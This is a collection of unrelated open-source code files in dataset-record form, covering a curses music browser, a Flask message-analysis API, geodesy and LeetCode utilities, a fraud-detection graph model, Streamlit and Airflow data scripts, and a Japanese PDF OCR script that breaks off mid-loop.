self.scr.erase()\n\n def refresh(self):\n self.scr.refresh()\n\n def resize(self):\n self.width, self.heigth = self.scr.getmaxyx()\n self.viewheight = self.height - self.header_height - self.footer_height\n\n def set_item(self, item):\n self.item = item\n if isinstance(self.current, List):\n self.current_item = self.current.items[item]\n elif isinstance(self.current, Playlist):\n self.current_item = self.current.tracks[item]\n elif isinstance(self.current, Artist):\n self.current_item = self.current.albums[item]\n elif isinstance(self.current, list):\n self.current_item = self.current[item]\n elif isinstance(self.current, tuple):\n self.current_item = self.current[1][item]\n\n def back(self):\n self.current = self.previous[-1][0]\n self.set_item(self.previous[-1][1])\n self.previous.pop()\n\n def enter(self):\n if isinstance(self.current_item, Track):\n return\n\n self.previous.append((self.current, self.item))\n\n self.current = self.current_item\n self.set_item(0)\n","repo_name":"sdispater/melomaniac","sub_path":"melomaniac/ui/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10231,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"4138321416","text":"\r\nfrom os import remove\r\nfrom flask import Flask, request\r\nfrom flask.json import jsonify\r\nfrom flask_cors import CORS\r\nfrom Manager import Adminstrador\r\nfrom xml.etree import ElementTree as ET\r\n\r\napp = Flask(__name__)\r\napp.config[\"DEBUG\"]=True\r\n\r\nCORS(app)\r\n\r\n\r\n\r\nadmin = Adminstrador()\r\n\r\n@app.route('/')\r\ndef home():\r\n return \"Esto funciona :D\"\r\n\r\n@app.route('/recibir', methods=['GET'])\r\ndef imprimir():\r\n if request.method == 'GET':\r\n mensajes2 = []\r\n diccionario = {}\r\n for mensaje in admin.mensajes:\r\n diccionario = {\r\n 'lugar' : mensaje.lugar,\r\n 'fecha' : mensaje.fecha,\r\n 'hora' : mensaje.hora,\r\n 'usuario' : mensaje.user,\r\n 'red' : mensaje.red,\r\n 'empresa' : mensaje.empresa,\r\n 'servicio' : mensaje.servicio,\r\n 'contenido' : ' '.join(mensaje.contenido),\r\n 'tipo' : mensaje.tipo\r\n }\r\n mensajes2.append(diccionario)\r\n return jsonify({'ok':True}, mensajes2)\r\n\r\n#Cargar Archivo\r\n@app.route('/CargaMasiva',methods=['POST'])\r\ndef Carguita():\r\n xml=request.data.decode('utf-8')\r\n admin.recibirXML(xml)\r\n admin.clasificacionMensajes()\r\n return (jsonify({'ok':True}))\r\n\r\n#-------> inicio endpoints\r\n\r\n@app.route(\"/CargaMasiva\", methods=[\"GET\"])\r\ndef Carguita2():\r\n try:\r\n file = open('BaseDatos.xml', 'r')\r\n admin.recibirXML(file.read())\r\n admin.clasificacionMensajes()\r\n return jsonify({'ok':True, 'msg': admin.salidaXML()}), 200\r\n except:\r\n return ({'ok':False, 'msg': 'Algo ocurrió'})\r\n\r\n@app.route('/reset',methods=['POST'])\r\ndef reset():\r\n admin.mensajes = []\r\n admin.empresas = []\r\n admin.xml = []\r\n admin.totalMensajes =0\r\n admin.totalPositivos = 0\r\n admin.totalNegativos = 0\r\n admin.totalNeutros = 0\r\n admin.nose = []\r\n admin.reporte2 = {}\r\n admin.reporte3 = {}\r\n admin.reporte4 = []\r\n remove(\"BaseDatos.xml\")\r\n return(jsonify({'ok': True, 'msg':'Reseteo con éxito :D'})), 200\r\n\r\n\r\n@app.route(\"/CargaMasiva\", methods=[\"GET\"])\r\ndef MostrarSalida():\r\n return ({'ok':False}),200\r\n\r\n\r\n@app.route(\"/peticiones\", methods=[\"GET\"] )\r\ndef MostrrPetciones ():\r\n if len(admin.empresas) > 0:\r\n return jsonify({'data':True}), 200\r\n else:\r\n return jsonify({'data':False})\r\n\r\n@app.route('/consultar', methods=['GET'])\r\ndef consultar():\r\n entrada = admin.xml\r\n salida = admin.salidaXML()\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n return jsonify(data)\r\n\r\n@app.route('/clasificar-por-fecha', methods = ['GET','POST'])\r\ndef clasificar():\r\n if request.method == 'GET':\r\n #json = request.get_json()\r\n empresas2 = []\r\n for em in admin.empresas:\r\n empresas2.append(em.nombre) \r\n return jsonify ({'empresas':empresas2}) #--> solo nombre de empresas\r\n\r\n if request.method == 'POST':\r\n datos = request.json\r\n dictionary = admin.clasificacionFecha(datos['date'], datos ['empresa'])\r\n print(dictionary)\r\n return jsonify(dictionary)\r\n\r\n@app.route('/resumen-por-rango', methods = ['GET','POST'])\r\ndef rango():\r\n #Si solo es un get, entondes retornara un listado de empresa para seleccionar\r\n if request.method == 'GET':\r\n #json = request.get_json()\r\n empresas2 = []\r\n for em in admin.empresas:\r\n empresas2.append(em.nombre)\r\n #Rettorna solo los nombre de las empresas\r\n return jsonify ({'empresas':empresas2})\r\n #Si es un post, entonces retornara los mensajes totales\r\n if request.method == 'POST':\r\n datos = request.json\r\n dictionary = admin.clasificacionRango_Fecha(datos['date1'],datos['date1'] , datos ['empresa'])\r\n print(dictionary)\r\n return jsonify(dictionary)\r\n\r\n\r\n@app.route('/generarPDF1', methods = ['POST'])\r\ndef pdf1():\r\n if request.method == \"POST\":\r\n\r\n entrada = admin.xml\r\n salida = admin.salidaXML()\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n\r\n return jsonify(data)\r\n\r\n\r\n\r\n@app.route(\"/reporte2\", methods = ['POST'])\r\ndef reporte2 ():\r\n return jsonify(admin.reporte2)\r\n\r\n@app.route(\"/reporte3\", methods = ['POST'])\r\ndef reporte3 ():\r\n return jsonify(admin.reporte3)\r\n\r\n@app.route(\"/reporte4\", methods = ['POST'])\r\ndef reporte4():\r\n #Se define la entrada como el XML enviado, pero lasalida como una funcion que procesa\r\n entrada = admin.nose\r\n salida = admin.reporte4\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n data = jsonify(data)\r\n return data\r\n \r\n@app.route(\"/prueba-de-mensaje\", methods = ['GET'])\r\ndef prueba1():\r\n return jsonify({'ok':'True'})\r\n\r\n@app.route(\"/prueba-de-mensaje\", methods = ['POST'])\r\ndef prueba2():\r\n xml2 = request.data.decode('utf-8')\r\n admin.prueba_mensaje(xml2)\r\n entrada = str(xml2)\r\n admin.reporte40 = entrada\r\n salida = admin.prueba_mensaje(xml2)\r\n return jsonify({'entrada':entrada, 'salida':salida})\r\n\r\n@app.route(\"/ayuda\", methods = ['GET'])\r\ndef MostrarAyuda():\r\n return jsonify({'1. Nombre':'Christian Alessander Blanco González',\r\n '2. Carnet': 202000173,\"Documentacion\" : False})\r\n\r\n \r\n\r\n#Iniciar el servidor\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=4000) ","repo_name":"KritianWhite/IPC2_Proyecto3_202000173","sub_path":"Backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"25653312640","text":"import math\n\ndef xyz2llh(x,y,z):\n # --- WGS84 constants\n a = 6378137.0\n f = 1.0 / 298.257223563\n # --- derived constants\n b = a - f*a\n e = math.sqrt(math.pow(a,2.0)-math.pow(b,2.0))/a\n clambda = math.atan2(y,x)\n p = math.sqrt(pow(x,2.0)+pow(y,2))\n h_old = 0.0\n # first guess with h=0 meters\n theta = math.atan2(z,p*(1.0-math.pow(e,2.0)))\n cs = math.cos(theta)\n sn = math.sin(theta)\n N = math.pow(a,2.0)/math.sqrt(math.pow(a*cs,2.0)+math.pow(b*sn,2.0))\n h = p/cs - N\n while abs(h-h_old) > 1.0e-6:\n h_old = h\n theta = math.atan2(z,p*(1.0-math.pow(e,2.0)*N/(N+h)))\n cs = math.cos(theta)\n sn = math.sin(theta)\n N = math.pow(a,2.0)/math.sqrt(math.pow(a*cs,2.0)+math.pow(b*sn,2.0))\n h = p/cs - N\n Rad2Deg = 180.0 / math.pi\n return clambda * Rad2Deg, theta * Rad2Deg, h","repo_name":"jorialand/gnss_jorialand_wp0_receiver_analysis","sub_path":"SRC/COMMON/Coordinates.py","file_name":"Coordinates.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"37430791692","text":"'''\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n'''\n\n'''\nSolution 1: Get the length of the linked list first then stop one less than n so that you stop just before you reach that element. We want to stop just before it so that we can set the next pointer past it and essential \"erase\" that node.\nSolution 2: There is apparently a one pass solution for this, but the LC community begs to differ. Since they seem to not agree with the one pass solution I'm not gonna do it here. You can look at the solution on lc to see it.\n'''\n\n\ndef removeNthFromEnd(self, head, n):\n lenOfList = 0\n dummy = head # keep a pointer to the head otherwise you\n\n while dummy: # get length of list\n dummy = dummy.next\n lenOfList += 1\n\n ans = head\n\n if lenOfList == n: # the below for loop does not work if the length of the list is the size of n\n return head.next\n\n for i in range(lenOfList-n-1): # this stops 1 index before n\n ans = ans.next\n\n if ans.next.next: # make sure we can overwrite the deleted node with its next\n ans.next = ans.next.next\n else: # the deleted node is at the end of the list\n ans.next = None\n\n return head\n","repo_name":"EddyYeung1/Top-75-LC-Questions","sub_path":"Solutions/Remove_Nth_LL.py","file_name":"Remove_Nth_LL.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"19920005446","text":"nums = list(input().split())\n\ndef average(nums):\n sum = 0\n for i in nums:\n sum += int(i)\n average = sum / len(nums)\n return average\n\ndef biggest(nums):\n big = int(0)\n for i in nums:\n if int(i) > int(big):\n big = i\n return big\n\nprint('{:.0f} {}'.format(average(nums), biggest(nums)))\n","repo_name":"jamesnatcher/Old-Python-Stuff","sub_path":"CS 101/CS 101 Labs**/outputs the max and average of a list of inputs.py","file_name":"outputs the max and average of a list of inputs.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1111573772","text":"import os\nimport sys\nsys.path.append(os.path.abspath(\"../megastore-app/backend\"))\n\nfrom app.db.Session import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n","repo_name":"zopeaj/megastore-app","sub_path":"backend/app/db/get_db.py","file_name":"get_db.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74542331672","text":"\"\"\"\nThis code is due to Zhiqin Yang (@visitworld123) Yutong Deng (@yutongD),\nYingtong Dou (@YingtongDou) and UIC BDSC Lab\nDGFraud (A Deep Graph-based Toolbox for Fraud Detection in TensorFlow 2.X)\nhttps://github.com/safe-graph/DGFraud-TF2\n\nPaper: 'Heterogeneous Graph Neural Networks for Malicious Account Detection'\nLink: https://arxiv.org/pdf/2002.12307.pdf\n\"\"\"\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), '../..')))\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom layers.layers import GEMLayer\n\nfrom utils.metrics import accuracy\n\n\nclass GEM(keras.Model):\n\n def __init__(self, input_dim, output_dim, args):\n super().__init__()\n\n self.nodes_num = args.nodes_num\n self.class_size = args.class_size\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.device_num = args.device_num\n self.hop = args.hop\n self.zero_init = tf.keras.initializers.Zeros()\n self.h_0 = tf.Variable(\n initial_value=self.zero_init(\n shape=(self.nodes_num, self.output_dim),\n dtype=tf.float32)\n )\n\n # GEM layers initialization\n self.layers_ = []\n self.input_layer = GEMLayer(self.nodes_num, self.input_dim,\n self.output_dim, self.device_num)\n for _ in range(self.hop - 1):\n self.layers_.append(\n GEMLayer(self.nodes_num, self.input_dim, self.output_dim,\n self.device_num))\n\n # logistic weights initialization\n self.x_init = tf.keras.initializers.GlorotUniform()\n self.u = tf.Variable(\n initial_value=self.x_init(shape=(self.output_dim, self.class_size),\n dtype=tf.float32), trainable=True)\n\n def call(self, inputs):\n\n \"\"\":param inputs include support, x, label, mask\n support means a list of the sparse adjacency Tensor\n x means feature\n label means label tensor\n mask means a list of mask tensors to obtain the train data\n \"\"\"\n\n supports, x, label, idx_mask = inputs\n\n # forward propagation\n outputs = [self.input_layer((x, supports, self.h_0))]\n for layer in self.layers_:\n hidden = layer((x, supports, outputs[-1]))\n outputs.append(hidden)\n gem_out = outputs[-1]\n\n # get masked data\n masked_data = tf.gather(gem_out, idx_mask)\n masked_label = tf.gather(label, idx_mask)\n\n # Eq. (7) in paper\n logits = tf.nn.softmax(tf.matmul(masked_data, self.u))\n loss = -tf.reduce_sum(\n tf.math.log(tf.nn.sigmoid(masked_label * logits)))\n acc = accuracy(logits, masked_label)\n\n return loss, acc\n","repo_name":"safe-graph/DGFraud-TF2","sub_path":"algorithms/GEM/GEM.py","file_name":"GEM.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"5"} +{"seq_id":"13172221048","text":"\n\nimport openpyxl\nfrom openpyxl import Workbook\n\n# print(new_sheet.max_row)\nclass datainput():\n\n @staticmethod\n def handling():\n\n Dict = {}\n\n path = \"C:\\\\Users\\\\Sathe\\\\PycharmProjects\\\\pythonProject1\\\\Pythonclass\\\\Pytestconcept\\\\Input file\\\\input file.xlsx\"\n\n new_book = openpyxl.load_workbook(path)\n\n Sheet = new_book.active\n # data = new_sheet.cell(row =1 ,column=1)\n # print(data.value)\n max_row = Sheet.max_row\n max_col = Sheet.max_column\n # # print(new_sheet.max_column)\n # for row in range(1,(max_row)+1):\n # for column in range(1,(max_col)+1):\n # cell_value = new_sheet.cell(row = row,column=column).value\n\n for i in range(2, max_row + 1):\n for j in range(1, max_col + 1):\n Dict[(Sheet.cell(row=1, column=j).value)] = Sheet.cell(row=i, column=j).value\n #print(dict)\n return Dict\n\nobj = datainput()\nobj.handling()","repo_name":"Satheeshtest94/pythonfiles","sub_path":"Pytestconcept/Utils/excelinput.py","file_name":"excelinput.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21891153869","text":"# Open Sublime text editor, create a new Python file, copy the following code in it and save it as 'census_app.py'.\r\n\r\n# Import modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport streamlit as st\r\n\r\n@st.cache()\r\ndef load_data():\r\n\t# Load the Adult Income dataset into DataFrame.\r\n\r\n\tdf = pd.read_csv('https://student-datasets-bucket.s3.ap-south-1.amazonaws.com/whitehat-ds-datasets/adult.csv', header=None)\r\n\tdf.head()\r\n\r\n\t# Rename the column names in the DataFrame using the list given above. \r\n\r\n\t# Create the list\r\n\tcolumn_name =['age', 'workclass', 'fnlwgt', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income']\r\n\r\n\t# Rename the columns using 'rename()'\r\n\tfor i in range(df.shape[1]):\r\n\t df.rename(columns={i:column_name[i]},inplace=True)\r\n\r\n\t# Print the first five rows of the DataFrame\r\n\tdf.head()\r\n\r\n\t# Replace the invalid values ' ?' with 'np.nan'.\r\n\r\n\tdf['native-country'] = df['native-country'].replace(' ?',np.nan)\r\n\tdf['workclass'] = df['workclass'].replace(' ?',np.nan)\r\n\tdf['occupation'] = df['occupation'].replace(' ?',np.nan)\r\n\r\n\t# Delete the rows with invalid values and the column not required \r\n\r\n\t# Delete the rows with the 'dropna()' function\r\n\tdf.dropna(inplace=True)\r\n\r\n\t# Delete the column with the 'drop()' function\r\n\tdf.drop(columns='fnlwgt',axis=1,inplace=True)\r\n\r\n\treturn df\r\n\r\ncensus_df = load_data()\r\n\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\nst.title(\"Census App\")\r\nst.sidebar.title(\"Graphs\")\r\n\r\nif st.sidebar.checkbox(\"Show Raw Data\"):\r\n\tst.dataframe(census_df)\r\n\r\n#st.sidebar.multiselect(\"Visualisations:\" , )\r\nst.sidebar.subheader(\"Visualisation Selector\")\r\n\r\nplot_list = st.sidebar.multiselect(\"Select Chart/Plots:\" , (\"Piechart\" , \"Boxplot\" , \"Countplot\"))\r\n\r\nif \"Piechart\" in plot_list:\r\n\tst.title(\"Piechart for Income Type\")\r\n\tplt.figure(figsize = (20,5))\r\n\tplt.pie(census_df[\"income\"].value_counts() , labels = census_df[\"income\"].value_counts().index, autopct = \"%1.2f%%\")\r\n\tst.pyplot()\r\nif \"Piechart\" in plot_list:\r\n\tst.title(\"Piechart for Gender Type\")\r\n\tplt.figure(figsize = (20,5))\r\n\tplt.pie(census_df[\"gender\"].value_counts() , labels = census_df[\"gender\"].value_counts().index, autopct = \"%1.2f%%\")\r\n\tst.pyplot()\r\nif \"Boxplot\" in plot_list:\r\n st.title(\"BoxPlots for different income groups\")\r\n plt.figure(figsize = (10,10))\r\n sns.boxplot(x = census_df[\"hours-per-week\"] , y = census_df[\"income\"])\r\n st.pyplot()\r\nif \"Boxplot\" in plot_list:\r\n st.title(f\"Box Plot for different gender groups\")\r\n plt.figure(figsize = (10,10))\r\n sns.boxplot(x = census_df[\"hours-per-week\"] , y = census_df[\"gender\"])\r\n st.pyplot()\r\nif \"Countplot\" in plot_list:\r\n st.title(\"Countplot for workclass\")\r\n\r\n plt.figure(figsize = (20,10))\r\n sns.countplot(census_df[\"workclass\"] , hue = census_df[\"income\"])\r\n\r\n\r\n st.pyplot()\r\n","repo_name":"Saimuthsa/Projects","sub_path":"census_app_project_95.py","file_name":"census_app_project_95.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34480187183","text":"import requests\nfrom zipfile import ZipFile\nfrom io import BytesIO\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nfrom datetime import datetime\nfrom io import StringIO\n\nfrom airflow.decorators import dag, task\nfrom airflow.operators.python import get_current_context\nfrom airflow.models import Variable\n\n\ndefault_args = {\n 'owner': 'n-baldina-24',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 10, 9)\n}\nschedule_interval = '0 12 * * *'\n\n@dag(default_args=default_args, catchup=False, schedule_interval=schedule_interval)\ndef nbaldina_games():\n @task(retries=3)\n def get_data():\n year = 1994 + hash(f'n-baldina-24') % 23\n games = pd.read_csv('/var/lib/airflow/airflow.git/dags/a.batalov/vgsales.csv')\n games_2013 = games.query('Year == @year')\n return games_2013\n\n @task(retries=4, retry_delay=timedelta(10))\n def get_global_game(games_2013):\n global_game = games_2013.groupby('Name') \\\n .agg({'Global_Sales': 'sum'}) \\\n .sort_values('Global_Sales', ascending=False) \\\n .idxmax()\n return global_game\n\n @task()\n def get_top_5_eu_genre(games_2013):\n top_5_eu_genre = games_2013.groupby('Genre') \\\n .agg({'EU_Sales': 'sum'}) \\\n .sort_values('EU_Sales', ascending=False) \\\n .head()\n return top_5_eu_genre\n\n @task()\n def get_platform_NA(games_2013):\n platform_NA = games_2013.query('NA_Sales>=1') \\\n .groupby('Platform', as_index=False) \\\n .agg({'Name': 'nunique'}) \\\n .sort_values('Name', ascending=False)\n platform_NA = platform_NA.Platform.to_list()\n return platform_NA\n\n @task()\n def get_publisher_jp(games_2013):\n publisher_jp = games_2013.groupby('Publisher') \\\n .agg({'JP_Sales': 'mean'}) \\\n .idxmax()\n return publisher_jp\n \n @task()\n def get_eu_over_jp(games_2013):\n tab_eu = games_2013.groupby('Name', as_index=False) \\\n .agg({'EU_Sales': 'sum'})\n tab_jp = games_2013.groupby('Name', as_index=False) \\\n .agg({'JP_Sales': 'sum'})\n tab = tab_eu.merge(tab_jp, on='Name', how='inner')\n tab['diff'] = tab['EU_Sales'] - tab['JP_Sales']\n eu_over_jp = tab.query('diff>0').Name.nunique()\n return eu_over_jp\n\n @task()\n def print_data(global_game, top_5_eu_genre, platform_NA, publisher_jp, eu_over_jp):\n\n print('Какая игра была самой продаваемой в этом году во всем мире?')\n print(global_game)\n print('Игры какого жанра были самыми продаваемыми в Европе? Перечислить все, если их несколько')\n print(top_5_eu_genre)\n print('На какой платформе было больше всего игр, которые продались более чем миллионным тиражом в Северной Америке? Перечислить все, если их несколько')\n print(platform_NA)\n print('У какого издателя самые высокие средние продажи в Японии? Перечислить все, если их несколько')\n print(publisher_jp)\n print('Сколько игр продались лучше в Европе, чем в Японии?')\n print(eu_over_jp)\n\n games_2013 = get_data()\n global_game = get_global_game(games_2013)\n top_5_eu_genre = get_top_5_eu_genre(games_2013)\n platform_NA = get_platform_NA(games_2013)\n publisher_jp = get_publisher_jp(games_2013)\n eu_over_jp = get_eu_over_jp(games_2013)\n\n print_data(global_game, top_5_eu_genre, platform_NA, publisher_jp, eu_over_jp)\n\nnbaldina_games = nbaldina_games()","repo_name":"ageichev/Portfolio","sub_path":"Jupiter notebook/mnt/HC_Volume_18315164/home-jupyter/jupyter-a-a-30/airflow/dags/n-baldina-24/nbaldina_lesson_3.py","file_name":"nbaldina_lesson_3.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4007434184","text":"import pytest\nfrom . import context\nfrom file_manger import read_cache, write_cache\nfrom data_types import Game\nfrom datetime import date as Date\n\n\n@pytest.fixture\ndef sample_games():\n games = [\n Game(\"Rutgers\", \"Princeton\", 6, 4, Date(1869, 11, 6)),\n Game(\"Princeton\", \"Rutgers\", 8, 0, Date(1869, 11, 13))\n ]\n return games\n\n\n@pytest.fixture\ndef sample_years():\n years = [1869]\n return years\n\n\ndef test_read_cache(sample_games, sample_years):\n input_file = 'test/data/sample_cache.json'\n games, years = read_cache(input_file)\n assert games == sample_games\n assert years == sample_years\n\n\ndef test_write_cache(sample_games, sample_years):\n output_file = 'test/data/cache_output.json'\n input_file = 'test/data/sample_cache.json'\n write_cache(output_file, sample_games, sample_years)\n\n expected = ''\n with open(input_file, 'r') as fp:\n expected = fp.read()\n\n result = ''\n with open(output_file, 'r') as fp:\n result = fp.read()\n\n assert result == expected\n","repo_name":"jklypchak13/CFB_Scorigami","sub_path":"test/test_file_manager.py","file_name":"test_file_manager.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41365650962","text":"# Python multiprocessing package provides API for process communication and management.\n# This demo demonstrates creating a worker pool and offloading jobs.\n# Processes communicate through shared memory (POSIX).\nimport multiprocessing as mp\nimport time\n\ndef job():\n print(1)\n\nstart = time.time()\n\nif __name__ == '__main__':\n mp.set_start_method('spawn')\n pool = mp.Pool(processes=4)\n for i in range(4):\n pool.apply(job)\n print(\"total time {}\".format(time.time() - start))\n\n","repo_name":"occlum/occlum","sub_path":"demos/python/python_glibc/python3.10-multiprocessing/multiprocessing_demo.py","file_name":"multiprocessing_demo.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1238,"dataset":"github-code","pt":"5"} +{"seq_id":"30822500127","text":"import os\nimport sys\nimport cv2\nfrom PyPDF2 import PdfReader ,PdfMerger\nfrom pdf2image import convert_from_path\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport pyocr\nimport re\nimport json\n\ndef isfloat(s): # 浮動小数点数値を表しているかどうかを判定\n try:\n float(s) # 文字列を実際にfloat関数で変換してみる\n except ValueError:\n return False\n else:\n return True\n\n\n\n#OCRエンジンを取得する\ntools = pyocr.get_available_tools()\nif len(tools) == 0:\n print(\"OCRエンジンが指定されていません\")\n sys.exit(1)\nelse:\n tool = tools[0]\n# print(text)\npdfFileName = \"サンプル計算書(1).pdf\"\ndpi0 = 600 # 数値を読み取る場合のDPI\ndpi1 = 200 # 結果出力時に使用するDPI\ndpi2 = 600 # ページのタイトル(日本語)を読み取る場合のDPI\nCdpi = dpi0 / dpi1 # 結果出力時に使用するDPIの比率\n\nLineW = 2\nTx = int(10 * dpi1 / 25.4)\nTy = int(10 * dpi1 / 25.4)\n\n\njsonFileName = \"sample.json\"\nif os.path.isfile(jsonFileName):\n json_open = open(jsonFileName, 'r')\n json_load = json.load(json_open)\n titles = json_load['item']\n pageNumber = json_load['page']\nelse:\n titles = [[\"断面検定比図\",\"短期荷重時\"],[\"柱の断面検定表\"],[\"梁の断面検定表\"],[\"壁の断面検定表\"]]\n with open(pdfFileName, \"rb\") as input:\n reader = PdfReader(input)\n PageMax = len(reader.pages)\n\n PageMax = 300\n # pdfの総ページ数は?\n print(\"サンプル計算書(1).pdf has %d pages.\\n\" % PageMax)\n pageNumber = []\n for i in range(len(titles)):\n pageNumber.append([])\n\n for i in range(PageMax):\n if i > 10:\n images = convert_from_path(pdfFileName,dpi=dpi2,first_page=i+1,last_page=i+1)\n image = images[0]\n img = np.array(image)\n h , w = img.shape[:2]\n split_pic=img[int(h*0.05):int(h*0.125),int(w*0.66):int(w*0.92),:]\n # plt.imshow(cv2.cvtColor(split_pic, cv2.COLOR_BGR2RGB))\n # plt.show()\n image2 = Image.fromarray(split_pic)\n\n # box_builder = pyocr.builders.TextBuilder(tesseract_layout=6)\n box_builder = pyocr.builders.TextBuilder()\n text = tool.image_to_string(image2,lang=\"jpn\",builder=box_builder)\n text = text.replace(\" \",\"\").replace(\" \",\"\").replace(\"\\t\",\"\").replace(\"\\n\",\"\").replace(\"染\",\"梁\")\n print(text)\n print(i+1)\n j = 0\n for title in titles:\n b = title[0] in text\n if len(title)>1 :\n for k in range(len(title)-1):\n b = b and title[k+1] in text\n if b:\n pageNumber[j].append(i+1)\n j += 1\n\n pageData = {\"item\":titles,\"page\":pageNumber}\n # data_json = json.dumps(pageData, indent=4, ensure_ascii=False)\n with open('sample.json', 'w') as fp:\n json.dump(pageData, fp, indent=4, ensure_ascii=False)\n\nstart_page = min(pageNumber[0])\nend_page = max(pageNumber[0])\n# 指定のページのデータを読み込む\nimages = convert_from_path(pdfFileName,dpi=dpi0,first_page=start_page,last_page=end_page)\nOut_image2 = convert_from_path(pdfFileName,dpi=dpi1,first_page=start_page,last_page=end_page)\n\n\n# img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n# retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\npdf_file_merger = PdfMerger()\n\nno = 0\nTotal_Contents = []\nTotal_Positions = []\nTotal_PointN = []\n\nfor image in images:\n no += 1\n print(\"page {0}\".format(no))\n print()\n img = np.array(image)\n img2 = img\n plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n plt.show()\n\n # モノクロ・グレースケール画像へ変換(2値化前の画像処理)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 2値化(Binarization):白(1)黒(0)のシンプルな2値画像に変換\n retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n # plt.imshow(img_binary)\n print('【直線を検出中・・・】2値化処理画像 - Binarization')\n # plt.imshow(cv2.cvtColor(img_binary, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n lines = cv2.HoughLinesP(img_binary, rho=1, theta=np.pi/360, threshold=15, minLineLength=60, maxLineGap=5.4)\n\n if lines is None: # 直線が検出されない場合\n print('\\n【直線の検出結果】')\n print(' 直線は検出されませんでした。')\n \n else: # 直線が検出された場合\n print('\\n【直線の検出結果】')\n print(' 直線が検出されました。検出した直線を削除します。')\n for line in lines:\n x1, y1, x2, y2 = line[0]\n # 検出した直線に赤線を引く\n red_lines_img = cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n print('\\n【直線検出部位の視覚化】')\n print(' 赤色部分が検出できた直線。')\n # plt.imshow(cv2.cvtColor(red_lines_img, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n for line in lines:\n x1, y1, x2, y2 = line[0]\n # 検出した直線を消す(白で線を引く):2値化した際に黒で表示される\n no_lines_img = cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 1)\n \n print('\\n【直線検出部位の削除結果:元の画像から削除】')\n print(' 白色部分が検出した直線を消した場所(背景が白の場合は区別できません)。')\n # plt.imshow(cv2.cvtColor(no_lines_img, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n image2 = Image.fromarray(no_lines_img)\n\n img = np.array(image2)\n # plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n # モノクロ・グレースケール画像へ変換(2値化前の画像処理)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 2値化(Binarization):白(1)黒(0)のシンプルな2値画像に変換\n retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n # plt.imshow(img_binary)\n print('【直線を検出中・・・】2値化処理画像 - Binarization')\n # plt.imshow(cv2.cvtColor(img_binary, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n lines = cv2.HoughLinesP(img_binary, rho=1, theta=np.pi/360, threshold=15, minLineLength=60, maxLineGap=5.4)\n\n if lines is None: # 直線が検出されない場合\n print('\\n【直線の検出結果】')\n print(' 直線は検出されませんでした。')\n \n else: # 直線が検出された場合\n print('\\n【直線の検出結果】')\n print(' 直線が検出されました。検出した直線を削除します。')\n for line in lines:\n x1, y1, x2, y2 = line[0]\n # 